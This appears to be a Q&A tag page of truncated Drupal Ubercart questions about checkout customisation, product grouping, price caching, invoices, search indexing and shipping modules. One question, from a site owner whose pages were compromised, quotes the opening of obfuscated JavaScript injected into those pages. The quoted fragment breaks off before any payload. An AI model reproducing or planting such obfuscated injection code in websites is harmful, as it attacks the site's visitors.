ubercart

How to associate node with products in Drupal/Ubercart

I am looking for a way to allow users to add node reference to each product or whole cart @ checkout. I am making web site where users can buy items and then receive them on board flight. Products are fixed, but user needs to tell for which flight he is buying items. Flights are nodes and users has flagged these nodes so there is no prob...

How do I group similar catalog products (CD & mp3) on the landing page of my Ubercart store?

I'm working on an ubercart/drupal 6 store that sells CD's, Vinyl, MP3's and more. We need to have multiple purchasing options (separate buttons for "buy cd", buy mp3 album") appear under one container for each band's product on the store's landing page. Right now each album has its own separate product page and sku created for the categ...

Disabling price cache in UberCart?

How do you disable the caching of selling price in UberCart? ...

drupal ubercart order update djano

How would you update a django app when there was an order in drupal ubercart. The order details and user information gets carried to django app. ...

Problem attaching Ubercart view to relevant content

Example page: http://giantcalculator.com/content/cartridge-filters It’s very cumbersome to connect the ubercart view to a relevant content page. In the example above I have attached the view to the bottom; you can scroll down to see it. It is a tedius process though in which I have to create the view, then create a mini panel, include t...

City selection on UberCart checkout menu?

I want users to be able to select a City from a dropdown list when checking out with UberCart. Is there a module that offers this? If not, how do I modify this form to include only certain cities as an option? Does the shipping module allow for you to get access to the City information? Basically, I want to customly calculate the shi...

How can I control the empty cart text in Drupal Ubercart

Options... 1) create a block that tests for and empty $order session type object. 2) find the configuration text area in the tangled ubercart admin area. 3) hack the module to call a block on empty cart rather than the hard coded text (if that's true.) Thanks! ...

UberCart statistics on products added.

I want statistics on the products added to carts, but not checked out. I.e. if a user adds a product to his cart, but doesnt actual pay out, how can I see these products that were added? Or maybe even get notifications everytime a product is added? ...

Ubercart add to cart trigger?

I want to keep track of all items added to uber cart. I.e. Whenever someone clicks ADD TO CART, I want to: create a database entry of the time and item added. This way I can see which items are most clicked on. The logic to add it to a db etc is easy to do. What I need to know is, how do I plug into the "add to cart" part. I.e. How do ...

How to override the review_cart form in ubercart.

I need to write a module that sends order data to an epayment service, similar to say, paypal. They need the data to be submitted from a form with elements that look something like this (notice the duplicate name): <input name="ORDER_PNAME[]" type="hidden" value="CD Player"> <input name="ORDER_PNAME[]" type="hidden" value="Geanta voiaj ...

Choose Alternate Products, add on Free Products, Addendum Products in Ubercart ?

Thanks for considering my question. I have Ubercart 2.x running on Drupal 6.x. I would like to show alternate products when a user is on the checkout page. This can be done through Views/Panels, yes? However, the need is that when a customer buys a product, they also need to choose an alternate in case there is a problem. "Customers wo...

Is it possible to have anonymous purchases with ubercart without the creation of a new user account?

I would like to be able to have anonymous users purchase a product but not have a new account created when they purchase it. Unfortunately the creation of a new user seems to be very tightly integrated into ubercart's ordering system. And, because the order module is part of the ubercart core, it's behavior cannot be overridden easily....

How do I dynamically change ubercart's default messages from my module

There are some products for which I would like to have a special checkout complete message that would differ from the default. I know that I could probably do this by changing the default redirect page to something else. [And I'm not sure if that would introduce another problem] However, I would like to know if there is a standard/be...

Chunks of javascript added to webpages on server

I've found out that my web pages (mainly index.php, main.html, include.inc) have been injected with a chunk of javascript codes at the very bottom after my original code. <script>try {this.l="";var d=window[unescape("%75%6e%65%73%63%61%70%65")];var M;if(M!='' && M!='a'){M='bt'};var A="";var Mc=new String();var e=null;this.k="";var t;if(...

How can I set up a short description of product under Drupal6 Übercart module?

I'll set up a short description of pruduct(name) under Drupal6 Ubercart module. Please help, who knows, how can i do it! Would be very important! Thank you very much in advance! Best Regards! Shred ...

Trying to set an error field to display an error div underneath it in Drupal / Ubercart

I am trying to get this code to work with another form element... if($error != ' field is required.') { //print 'in field is required<br>'; $_SESSION['err_counter'] = $_SESSION['err_counter'] + 1; //print 'error counter = '. $_SESSION['err_counter'] . '<br>'; $idx = array_search($error, $_SESSION['messages']['error']); ...

Need help with Ubercart invoice template

I want to display the price adjustment of an attribute on the customer's invoice. so, for example the customer's invoice would contain this; Products on order: 1 x Blue Sweater - $15 SKU: 22810R Weave: coarse $1.95 Wool: Marino $3.00 Weave and Wool would be the attributes with their price adjustments. I know this is controlled in t...

ubercart search - products aren't indexed

Our shopping website is based on drupal's ubercart. I have setup ApacheSolr and ApacheSolr Ubercart integration modules. I have created a few products on my website, but am unable to get these products indexed. The default ApacheSolr module works, i.e., I am able to index drupal's default stories. But am unable to achieve indexing for ...

Is it possible to make a shopping cart persistent in Ubercart

I would like users to be able to have persistent shopping carts. In other words, unless they check out the shopping cart explicitly the shopping cart with the same items should be available the next time they visit the site. Obviously this would be through the use of a cookie... Is this possible in Drupal? ...

Where is Ubercart USPS Shipping module

I can't seem to find the Ubercart 2.x version of USPS Shipping module! This is the closest I could come, but I feel like I shouldn't be constructing the module from a source view. http://api.ubercart.org/api/file/ubercart/shipping/uc_usps/uc_usps.module/2/source There was a zip available here of a spin-off module... http://www.ubercart...